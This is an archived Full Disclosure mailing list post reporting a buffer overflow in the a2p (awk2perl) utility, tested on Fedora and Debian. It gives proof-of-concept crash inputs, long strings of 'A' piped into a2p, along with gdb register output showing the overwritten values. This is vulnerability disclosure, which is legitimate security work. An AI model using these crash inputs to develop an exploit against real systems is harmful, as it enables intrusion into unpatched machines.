Full Disclosure mailing list archives
/usr/bin/a2p buffer overflow
From: up201407890 () alunos dcc fc up pt
Date: Sat, 27 Dec 2014 22:58:37 +0100
$ echo @alunos.dcc.fc.up|sed 's/^/up201407890/g;s/$/.pt/g' I have found what it appears to be a buffer overflow on the a2p (awk2perl) utility. It comes by default on several different systems. Tested on Fedora 20, Fedora 19, Debian, and works probably on every other UNIX-like. Eg: [saken@zippy ~]$ python -c "print 'A' * 2048" | a2p >/dev/null [saken@zippy ~]$ python -c "print 'A' * 2049" | a2p >/dev/null [saken@zippy ~]$ python -c "print 'A' * 2050" | a2p >/dev/null Segmentation fault or [saken@zippy ~]$ python -c "print 'A'*3000" > lel [saken@zippy ~]$ gdb a2p (gdb) r lel Starting program: /usr/bin/a2p lel [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib64/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 0x000000000040b7c5 in yyparse () (gdb) info reg rax 0x4141414141414141 8680820740569200760 rbx 0x1 1 rcx 0x0 0 rdx 0x67d724 6805284 rsi 0x67dab0 6806192 rdi 0x41414141 2021161080 rbp 0x6 0x6 rsp 0x7fffffffe1d0 0x7fffffffe1d0 r8 0x8 8 r9 0x5f 95 r10 0x0 0 r11 0x38e0174b60 244277791584 r12 0x6 6 r13 0x0 0 r14 0x0 0 r15 0x0 0 rip 0x40b7c5 0x40b7c5 <yyparse+757> eflags 0x10206 [ PF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 ('^@+@`'^'-!@%.') ---------------------------------------------------------------- This message was sent using IMP, the Internet Messaging Program. _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- /usr/bin/a2p buffer overflow up201407890 (Dec 28)